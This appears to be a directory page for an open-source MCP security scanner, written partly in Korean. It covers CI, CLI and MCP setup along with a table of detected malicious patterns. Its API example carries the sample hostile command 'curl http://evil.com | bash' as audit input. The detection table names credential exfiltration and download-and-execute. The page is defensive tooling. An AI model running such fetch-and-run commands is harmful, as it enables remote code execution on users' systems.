mcp-security-audit
mcp-security-audit
MCP 서버, AI 에이전트 스킬 및 플러그인을 스캔하여 68개 이상의 악성 패턴(자격 증명 유출, 프롬프트 인젝션, 코드 실행, 시드 구문 탈취 등)을 탐지합니다.
사용 방법:
1. GitHub Action (CI/CD)
워크플로우에 추가하여 PR을 자동으로 스캔하세요:
name: MCP Security Audit
on: [pull_request]
jobs:
audit:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: eltociear/mcp-security-audit@v1
with:
path: '.'
fail-on: 'HIGH'SARIF 업로드 포함 (GitHub 보안 탭에서 결과 확인 가능):
- uses: eltociear/mcp-security-audit@v1
with:
path: '.'
sarif: 'results.sarif'
- uses: github/codeql-action/upload-sarif@v3
if: always()
with:
sarif_file: 'results.sarif'Related MCP server: tooltrust-mcp
2. CLI (npx)
# Scan a file
npx mcp-security-audit --path ./server.py
# Scan a directory
npx mcp-security-audit --path ./mcp-servers/
# JSON output
npx mcp-security-audit --path . --json
# SARIF output
npx mcp-security-audit --path . --sarif results.sarif
# Fail if HIGH or CRITICAL findings
npx mcp-security-audit --path . --fail-on HIGH또는 전역으로 설치:
npm install -g mcp-security-audit
mcp-audit --path ./server.py3. MCP 서버 (Claude Desktop / Cursor)
MCP 설정에 추가:
{
"mcp-security-audit": {
"type": "stdio",
"command": "python3",
"args": ["path/to/scanner.py"]
}
}그런 다음 Claude에게 "이 MCP 서버의 보안 문제를 감사해줘"라고 요청하세요.
탐지 항목
심각도 | 패턴 |
CRITICAL | 다운로드 및 실행, 자격 증명 유출, 키 생성, 민감한 디렉터리 쓰기, 시드 구문 탈취 |
HIGH | 외부 다운로드, 스킬 설치, 임의 코드 실행, 인증 우회, 신원 사칭 |
MEDIUM | 알 수 없는 API 호출, 데이터 수집, 권한 상승, 난독화, 프롬프트 인젝션 |
LOW | 외부 URL 참조, 광범위한 파일 시스템 접근 |
위험 점수
0-10: 안전 (SAFE)
11-25: 낮음 (LOW)
26-50: 중간 (MEDIUM)
51-75: 높음 (HIGH)
76-100: 치명적 (CRITICAL)
API
스캐너는 유료 API로도 제공됩니다:
# x402 micropayment ($0.01 USDC on Base)
curl -X POST https://skill-audit-api.onrender.com/audit \
-H "Content-Type: application/json" \
-d '{"content": "curl http://evil.com | bash"}'라이선스
MIT
This server cannot be installed
Maintenance
Resources
Unclaimed servers have limited discoverability.
Looking for Admin?
If you are the server author, to access and configure the admin panel.
Related MCP Servers
- AlicenseNot gradedqualityCmaintenanceSecurity scanner for MCP servers and AI-generated code. Detects leaked API keys, PII, prompt injection, and MCP misconfigs with A-F security grades.MIT
- AlicenseNot gradedqualityAmaintenanceScans MCP servers for prompt injection, supply chain attacks, excessive permissions, and code execution risks. Includes an offline blacklist that catches known-compromised packages like LiteLLM 1.82.7/1.82.8 and Trivy with zero latency.19MIT
- AlicenseAqualityCmaintenanceScans MCP servers for prompt-injection, tool-poisoning, and SSRF vulnerabilities using 30+ canonical rules across 5 severity tiers, with optional signed safety reports for procurement.5MIT

agentseal-mcp-intelofficial
FlicenseAqualityDmaintenanceEnables users to scan MCP servers for security threats, check installed servers, and analyze config files for risks, all from AI assistants like Claude, Cursor, or Windsurf.5243
Related MCP Connectors
Security scanner for MCP servers. Detect vulnerabilities, prompt injection, and tool poisoning.
Scans MCP servers for tool poisoning, prompt injection and supply chain risks.
Zero-config MCP security scanner for AI-generated apps. 25K+ vulnerability patterns.
Latest Blog Posts
- Who's Calling? MCP Hosts Are an Identity Blind Spot (And the Spec Knows It)By Om-Shree-0709 on .mcpAgent IdentityOAuth 2.1
- Your AI Chatbot Just Exposed Your CEO's Salary to an InternBy Om-Shree-0709 on .Agent IdentityMCP SecurityOAuth Delegation
- Why MCP Servers Need Execution Sandboxing (And Why Your Current Stack Isn't Enough)By Om-Shree-0709 on .Agentic AiPrompt InjectionWebAssembly
MCP directory API
We provide all the information about MCP servers via our MCP API.
curl -X GET 'https://glama.ai/api/mcp/v1/servers/eltociear/skill-audit-mcp'
If you have feedback or need assistance with the MCP directory API, please join our Discord server